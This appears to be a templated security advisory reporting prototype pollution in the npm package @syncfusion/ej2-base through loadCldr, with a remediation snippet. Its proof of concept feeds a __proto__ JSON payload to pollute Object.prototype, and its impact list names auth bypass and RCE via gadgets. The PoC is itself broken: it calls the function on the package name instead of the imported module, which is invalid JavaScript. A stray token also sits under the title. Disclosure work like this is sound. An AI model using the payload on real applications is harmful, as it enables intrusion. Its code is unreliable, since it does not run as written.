Prototype Pollution in `@syncfusion/ej2-base`

[gnsehfvlr]

Prototype Pollution in @syncfusion/ej2-base

Summary

@syncfusion/ej2-base (<= 33.1.44) is vulnerable to Prototype Pollution via loadCldr.

• CWE: CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes
• Severity: High (CVSS 7.5)
• Weekly Downloads: 252,852
• npm: https://www.npmjs.com/package/@syncfusion/ej2-base

Description

The function(s) loadCldr in @syncfusion/ej2-base do not properly restrict modifications to Object.prototype. When processing user-controlled input, an attacker can inject properties via __proto__ or constructor.prototype keys, polluting the prototype of all JavaScript objects in the application.

Attack vectors: __proto__ direct, __proto__ nested, constructor.prototype

Proof of Concept

const target = require('@syncfusion/ej2-base');

// 1. Pollute Object.prototype
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
@syncfusion/ej2-base.loadCldr({}, malicious);

// 2. Verify pollution
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');

Impact

Successful exploitation allows an attacker to:

• Denial of Service (DoS) by overriding critical object methods like toString or hasOwnProperty
• Authentication Bypass via polluted authorization checks
• Remote Code Execution (RCE) when combined with gadgets (e.g., child_process.spawn with shell:true pollution)

Remediation

Add key filtering to prevent prototype pollution:

function isSafe(key) {
  return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}

Or use Object.create(null) for target objects to prevent prototype chain access.

References

• CWE-1321: Improperly Controlled Modification of Object Prototype Attributes
• https://www.npmjs.com/package/@syncfusion/ej2-base